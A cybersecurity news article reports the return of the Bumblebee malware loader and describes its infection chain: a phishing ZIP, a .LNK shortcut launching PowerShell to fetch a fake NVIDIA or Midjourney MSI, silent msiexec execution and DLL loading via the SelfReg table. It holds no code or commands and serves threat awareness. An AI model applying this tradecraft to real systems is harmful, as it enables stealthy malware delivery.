HQ/EMEAFind out how we can help your business
Several months of silence have ended after the Bumblebee malware loader has emerged in a new set of cybercriminal operations.
This alleged TrickBot-authored malware first appeared in 2022, and researchers deemed it an alternative to the BazarLoader backdoor. Moreover, this malware has allowed ransomware operators to acquire access to targeted networks.
Researchers explained that the Bumblebee loader primarily infects users via phishing, malvertising, and SEO poisoning to promote various apps. Its standard payloads include infostealers, Cobalt Strike beacons, and various ransomware strains.
A multinational law enforcement operation, Operation Endgame, confiscated over a hundred servers serving several malware loader operations earlier this year. Since then, Bumblebee has gone on a hiatus.
However, some researchers claimed that a new Bumblebee activity has appeared in the threat landscape, sparking speculations about its re-emergence.
The latest Bumblebee malware campaign still leverages phishing tactics.
According to reports, the current Bumblebee malware operation starts with a phishing email that deceives targeted users into downloading a malicious ZIP bundle.
Researchers noted that this ZIP file contains a .LNK shortcut called Report-41952.lnk, which prompts PowerShell to download a malicious .MSI file that poses as a valid NVIDIA driver update or Midjourney installer from a remote server.
The new operation then executes the MSI file in the background with msiexec.exe and the /qn option to ensure the malware campaign runs without user interaction. Subsequently, the malware uses the SelfReg table within the MSI structure, which instructs msiexec.exe to load the DLL into its own address space and call its DllRegisterServer function to avoid launching additional processes.
Once the process loads and executes the DLL, the malware begins the unpacking procedure, which deploys the Bumblebee malware into memory.
Furthermore, the Bumblebee payload includes its characteristic internal DLL and exported function naming scheme and the configuration extraction methods used in its previous version.
As of now, the initial investigation has not disclosed any further details about the payloads dropped by the new Bumblebee malware operation. The scope of this latest malware remains a mystery, but the new report implies that the new malware campaign could return and compromise various organisations.
